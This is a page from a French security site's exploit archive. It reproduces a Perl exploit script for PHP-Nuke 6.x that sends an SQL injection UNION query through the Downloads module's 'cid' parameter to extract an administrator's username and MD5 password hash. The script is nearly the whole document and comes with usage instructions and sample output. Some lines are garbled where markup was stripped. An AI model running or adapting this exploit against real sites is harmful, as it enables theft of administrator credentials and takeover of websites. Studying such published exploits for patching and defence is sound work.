PHP-NUKE version

    
 
#!/usr/bin/perl -w
                              use IO::Socket;

                              ########################################
                              ## THIS CODE PUBLIC NOW  =)))        ##
                              ########################################
                              ## __________               ___ ___   ##
                              ## \______   \__ __  ______/   |   \  ##
                              ##  |       _/  |  \/  ___/    _    \ ##
                              ##  |    |   \  |  /\___ \\         / ##
                              ##  |____|_  /____//____  >\___|_  /  ##
                              ##         \/           \/       \/   ##
                              ########################################
                              ## based on 'cid' sql injection vuln
                              ## in Download module, more info about
                              ## this vuln u can see here:
                              ## http://rst.void.ru/texts/advisory10.htm
                              ########################################
                              ## work only on mysql version > 4.0
                              ########################################
                              ## tested on PHP-Nuke versions: 6.9, 6.0, 6.5
                              ## C:\>r57phpnuke.pl 127.0.0.1 /phpnuke/ admin
                              ##
                              ## server : 127.0.0.1
                              ## folder : /phpnuke/
                              ## aid    : admin
                              ##
                              ## [~] prepare to connect...
                              ## [+] connected
                              ## [~] prepare to send data...
                              ## [+] success
                              ## [~] wait for reply...
                              ## [+] w00t...
                              ## [+] USER: admin
                              ## [+] MD5 HASH: 5f4dcc3b5aa765d61d8327deb882cf99
                              ##
                              ########################################

                              if (@ARGV  /> \n";
                              print "\n";
                              print "  - host for attack\n";
                              print " /> - PHP-nuke folder ( /phpnuke/ , /nuke/ or / for no folder )\n";
                              print "  - user aid , nick ( admin , blabla )\n";
                              print "#############################################################";
                              exit();
                              }

                              $server = $ARGV[0];
                              $folder = $ARGV[1];
                              $aid = $ARGV[2];

                              print "\n";
                              print "server : $server\n";
                              print "folder : $folder\n";
                              print "aid    : $aid\n";
                              print "\n";
                              $success = 0;
                              $path_download = "modules.php?name=Downloads&d_op=viewdownload&cid=2%20
                              UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--";
                              $GET = $folder . $path_download;
                              print "[~] prepare to connect...\n";
                              $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || 
                              die "[-] connect failed\n";
                              print "[+] connected\n";
                              print "[~] prepare to send data...\n";
                              print $socket "GET $GET HTTP/1.1\n";
                              print $socket "Host: $server\n";
                              print $socket "Accept: */*\n";
                              print $socket "Http-Referer: http://microsoft.com\n";
                              print $socket "User-Agent: Internet Explorer 6.0\n";
                              print $socket "Pragma: no-cache\n";
                              print $socket "Cache-Control: no-cache\n";
                              print $socket "Connection: close\n\n";
                              print "[+] success\n";
                              print "[~] wait for reply...\n";
                              while ($answer = )
                              {
                              #print "$answer";
                              if ($answer=~/(&cid=)(\w)(\">)($aid)()(.{0,20})
                              ()(.{32})()/)
                              {
                              $success = 1;
                              print "[+] w00t...\n";
                              print "[+] USER: $1 \n[+] MD5 HASH: $6\n";
                              }
                              }
                              if ($success == 0) { print "[-] exploit failed =(\n"; }
                              
                              

 Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits